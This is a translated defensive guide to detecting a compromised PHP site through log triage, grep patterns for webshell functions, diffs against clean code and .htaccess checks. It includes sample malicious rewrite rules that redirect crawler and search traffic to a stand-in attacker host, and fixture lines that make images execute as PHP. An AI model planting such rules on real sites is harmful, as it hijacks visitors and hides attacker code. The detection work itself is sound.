
How to tell whether a PHP website has been compromised (Web security) - Computer Materials

Computer Materials   Date: 2019-01-01
[www.oriental01.com - Computer Materials]

Translated from: http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/

0x01 Check the access logs


Look for file-upload style activity: POST requests to PHP files, especially under directories that should only hold static content (an upload directory is the usual place for a webshell to land). Two lines like the following, from a combined-format access log, are typical of a webshell being driven by its operator; note the generic "Mozilla/5.0" user agent, the empty referer and the tiny 36-byte responses:

```
IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
```

nginx's default access log directive is:

```nginx
access_log logs/access.log;
```

or, with the log format named explicitly (the predefined `combined` format is what nginx uses when none is given):

```nginx
access_log logs/access.log combined;
```

The path is relative to the nginx prefix, so by default the log lives under:

```
<nginx install directory>/logs/access.log
```

Distribution packages usually move it: on Debian/Ubuntu it is `/var/log/nginx/access.log`, and Apache writes the same combined format to `access.log` under its own log directory.
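As an added example (not from the original article or the post it translates), the shell function below runs this check over a few constructed combined-format log lines: it counts POST requests to `.php` files under directories that should only hold static content and lists the busiest client/path pairs first. The directory list, the sample lines and the documentation-range client addresses are assumptions for the demonstration; adjust `STATIC_DIRS` to your own application layout.

```shell
#!/bin/sh
# Added example (not from the original article): triage a combined-format
# access log for POST requests to PHP files in directories that should only
# hold static content. The log lines are constructed samples; the directory
# list is an assumption, adjust it to your application.

# Directories under the web root that should never serve PHP (assumption).
STATIC_DIRS='uploads|images|cache|style_images'

# Write a small constructed log to a temp file and print its path.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.5 - - [01/Mar/2013:06:12:58 -0600] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [01/Mar/2013:06:13:10 -0600] "GET /uploads/monthly_10_2012/photo.jpg HTTP/1.1" 200 84211 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.77 - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
198.51.100.77 - - [01/Mar/2013:06:16:59 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2013:06:20:01 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "http://example.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.77 - - [01/Mar/2013:06:21:13 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# Print "count client path" for every POST to a .php file under a static-only
# directory, most frequent first. Split on whitespace, the request line of a
# combined-format entry is fields 6-8: "POST /path HTTP/1.1", with the opening
# quote attached to field 6. A POST to the normal login script is not reported.
suspicious_posts() {
    awk -v dirs="$STATIC_DIRS" '
        $6 == "\"POST" && $7 ~ /\.php(\?|$)/ && $7 ~ ("/(" dirs ")/") {
            hits[$1 " " $7]++
        }
        END { for (k in hits) print hits[k], k }
    ' "$1" | sort -rn
}

log=$(make_sample_log)
suspicious_posts "$log"
rm -f "$log"
```

On a real log, feed the function the rotated files as well (`zcat access.log.*.gz`), and read the flagged paths in the next section's source scan: a 36-byte `200` to a script nobody uploaded on purpose is the webshell answering a command.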

0x02 Find files containing malicious PHP code


2.1 Find recently modified PHP files

```bash
find . -type f -name '*.php' -mtime -7
```

`-type f` restricts the search to regular files; `-mtime -7` selects files whose contents were modified within the last 7*24 hours. Attackers routinely reset the modification time with `touch` to blend in with the rest of the tree; the inode change time cannot be set from userland, so run the same search with `-ctime -7` as well and look at anything the two lists disagree on.

The result may look like:

```
./uploads/monthly_04_2008/index.php
./uploads/monthly_10_2008/index.php
./uploads/monthly_08_2009/template.php
./uploads/monthly_02_2013/index.php
```

2.2 Search files for suspicious code

```bash
find . -type f -name '*.php' | xargs grep -l "eval *(" --color
```

(the ` *` matches any number of spaces, including none, between the function name and the opening parenthesis)

```bash
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
```

Note: many commands do not read their arguments from a pipe, but that is exactly what is needed here, so `xargs` is used to turn the piped file names into command-line arguments. `grep -l` prints only the names of the files that contain the string; without `-l` it prints the matching lines themselves. File names containing spaces break this pairing; use `find ... -print0 | xargs -0 grep ...` if the tree has any.

The meaning of the strings searched for:

eval() executes a string as PHP code and is the core of the most common PHP one-line webshell.

base64_decode() decodes a base64 string; when the attack payload is delivered base64-encoded, this is the function that unwraps it.

gzinflate() decompresses a string; a payload compressed with gzdeflate() is unpacked with this function.

str_rot13() applies a rot13 transformation to a string, another layer used to hide the payload from simple searches.

A regular expression can also be used to search the files for suspicious code in one pass (the closing parenthesis must be escaped as `\(`; an unescaped `(` at the end of an extended regular expression is a syntax error for `grep -E`/`egrep`):

```bash
find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\("
```

The functions webshells commonly use:

mail(): can be used to send spam to the site's users.

fsockopen(): opens a network connection or a Unix domain socket; a payload can use it to make outbound requests.

pfsockopen(): the persistent variant of fsockopen(), with the same use.

stream_socket_client(): establishes a remote connection, for example:

```php
<?php
$fp = stream_socket_client("tcp://www.example.com:80", $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    fwrite($fp, "GET / HTTP/1.0\r\nHost: www.example.com\r\nAccept: */*\r\n\r\n");
    while (!feof($fp)) {
        echo fgets($fp, 1024);
    }
    fclose($fp);
}
?>
```

exec(): runs an operating-system command.

system(): like exec(), but prints the command output.

passthru(): like exec(), but passes raw binary output straight to the browser.

preg_replace() with a pattern carrying the `e` modifier evaluates the replacement string as PHP code before substituting it, so it is another code-execution sink to look for. (The modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so it only matters on old installations, which are exactly the ones that get compromised.) The following search looks for it:

```bash
find . -type f -name '*.php' | xargs egrep -i "preg_replace *\((['|\"])(.).*\2[a-z]*e[^\1]*\1 *," --color
```

0x03 Compare against a clean copy of the code


This requires a clean copy of the code, of the same version as the deployed one, which is then compared with the code in use, for example:

```bash
diff -r wordpress-clean/ wordpress-compromised/ -x wp-content
```

This compares the wordpress-clean/ and wordpress-compromised/ directories, skipping the wp-content/ subdirectory. wp-content/ holds the themes, plugins and uploads, which differ from site to site; compare each installed theme and plugin against a clean copy of its own release separately, since those are where injected code usually ends up.

0x04 Search writable directories


Check whether these directories contain suspicious files. The following script finds PHP files inside directories whose permissions are 777:

```bash
search_dir=$(pwd)
writable_dirs=$(find "$search_dir" -type d -perm 0777)
for dir in $writable_dirs
do
    #echo $dir
    find "$dir" -type f -name '*.php'
done
```

`-perm 0777` is an exact match and misses directories that are world-writable with other bits set (1777, 757); `-perm -o+w` catches any world-writable directory.

PHP code is often appended to or hidden inside .jpg files, so when inspecting these directories also search the image files:

```bash
find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php
```

Note: `-iname` matches the file name case-insensitively, and `grep -i` matches the pattern case-insensitively. Such a file only runs if something tells the server to execute it (an `.htaccess` or `.user.ini` in the same directory, or an include from another script), so a hit here is a reason to read the next sections carefully.

0x05 Look for injected iframe tags


A common payload is an injected iframe tag, so save the page source and search it for iframe tags with a command such as:

```bash
grep -i '<iframe' mywebsite.txt
```

where mywebsite.txt is the saved HTML. For dynamically generated pages, use the Firefox Live HTTP Headers extension (or simply `curl -s` against the page URL) to capture the HTML as the server actually sends it, then search that for iframe tags. Compare what the server sends to a browser user agent with what it sends to a crawler user agent: injected content is frequently served to one and not the other.

0x06 Search the database for suspicious strings

Search content tables (post bodies, options, widgets and similar) for the keywords above, for example with the SQL LIKE patterns `%base64_%` and `%eval(%`, and for `<iframe`.

0x07 Check the .htaccess files

Check whether they contain auto_prepend_file or auto_append_file, using the following commands:

```bash
find . -type f -name '.htaccess' | xargs grep -i auto_prepend_file
find . -type f -name '.htaccess' | xargs grep -i auto_append_file
```

auto_prepend_file names a PHP script that is loaded before the requested script runs; auto_append_file names one that is loaded after it. With either set in an .htaccess file, every PHP script served from that directory (and its subdirectories) also executes the attacker's file, without any of the site's own files being changed. Note that `php_value` lines in .htaccess only take effect under mod_php; when PHP runs as PHP-FPM or CGI, the same settings are read from `.user.ini` files instead, so search for those with the same patterns.

.htaccess files can also be used to hijack the site's traffic to the attacker's site:

```apache
RewriteCond %{HTTP_USER_AGENT} ^.*Baiduspider.*$
RewriteRule ^(.*)$ http://www.hacker.com/muma.php [R=301]
```

This redirects visits from the Baidu crawler to the attacker's site (the indicators are HTTP_USER_AGENT and the http keyword).

```apache
RewriteCond %{HTTP_REFERER} ^.*baidu.com.*$
RewriteRule ^(.*)$ http://www.hacker.com/muma.php [R=301]
```

This redirects visitors arriving from Baidu search results to the attacker's site (the indicators are HTTP_REFERER and the http keyword). Because only crawlers or search visitors are redirected, the site owner browsing directly sees nothing wrong. To check whether .htaccess changes are hijacking traffic, search the .htaccess files with the following commands:

```bash
find . -type f -name '.htaccess' | xargs grep -i http
find . -type f -name '.htaccess' | xargs grep -i HTTP_USER_AGENT
find . -type f -name '.htaccess' | xargs grep -i HTTP_REFERER
```
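As an added example, not code from the original article, the script below combines the .htaccess checks of this section into one function and runs it against four constructed configuration files: a normal front-controller rewrite (no findings expected), a crawler/referer-conditional redirect to another host, an auto_prepend_file plus an AddType line that makes .jpg files run as PHP, and a `.user.ini` carrying the same prepend under PHP-FPM/CGI. The `.user.ini` and AddType/AddHandler checks go beyond the article; file contents and the example.net host are made up for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original article: the .htaccess checks of
# this section (prepend/append, redirects to other hosts, crawler- and
# referer-conditional rewrites) as one function, extended with two checks the
# article does not list: .user.ini files, which carry auto_prepend_file under
# PHP-FPM/CGI where php_value in .htaccess is ignored, and AddType/AddHandler
# lines that make another extension run as PHP. All files are constructed.

# Build the constructed tree and print its path.
make_htaccess_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/blog" "$d/uploads" "$d/shop"
    # Normal front-controller rewrite: no findings expected.
    printf '%s\n' 'RewriteEngine On' \
        'RewriteCond %{REQUEST_FILENAME} !-f' \
        'RewriteRule ^(.*)$ index.php [L]' > "$d/.htaccess"
    # Sends only crawlers and search referrals to another host (cloaked hijack).
    printf '%s\n' 'RewriteEngine On' \
        'RewriteCond %{HTTP_USER_AGENT} ^.*Baiduspider.*$ [OR]' \
        'RewriteCond %{HTTP_REFERER} ^.*baidu\.com.*$' \
        'RewriteRule ^(.*)$ http://example.net/muma.php [R=301,L]' > "$d/blog/.htaccess"
    # Runs a hidden "image" before every script and makes .jpg executable (mod_php).
    printf '%s\n' 'php_value auto_prepend_file .cache.jpg' \
        'AddType application/x-httpd-php .jpg' > "$d/uploads/.htaccess"
    # Same prepend trick for PHP-FPM/CGI, which read .user.ini instead.
    printf '%s\n' 'auto_prepend_file=/tmp/.x.php' > "$d/shop/.user.ini"
    echo "$d"
}

# Print "indicator: path" for every .htaccess / .user.ini below $1 that matches.
# Directive names are matched case-insensitively, as Apache itself treats them.
htaccess_findings() {
    ( cd "$1" || exit 1
      files=$(find . -type f \( -name '.htaccess' -o -name '.user.ini' \) | sort)
      for f in $files; do
          grep -qiE 'auto_(prepend|append)_file' "$f" \
              && echo "auto_prepend/append: $f"
          grep -qiE '^[[:space:]]*Rewrite(Rule|Cond).*https?://' "$f" \
              && echo "redirect-to-external: $f"
          grep -qiE '^[[:space:]]*RewriteCond.*(HTTP_USER_AGENT|HTTP_REFERER)' "$f" \
              && echo "conditional-rewrite: $f"
          grep -qiE '^[[:space:]]*Add(Type|Handler).*php' "$f" \
              && echo "php-handler-for-extension: $f"
      done
      true ) || true
}

d=$(make_htaccess_fixture)
htaccess_findings "$d"
rm -rf "$d"
```

A redirect-to-external hit is not malicious by itself (an HTTPS or canonical-host redirect looks the same), so read the rule; the combination with a User-Agent or Referer condition is what marks the cloaked hijack.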
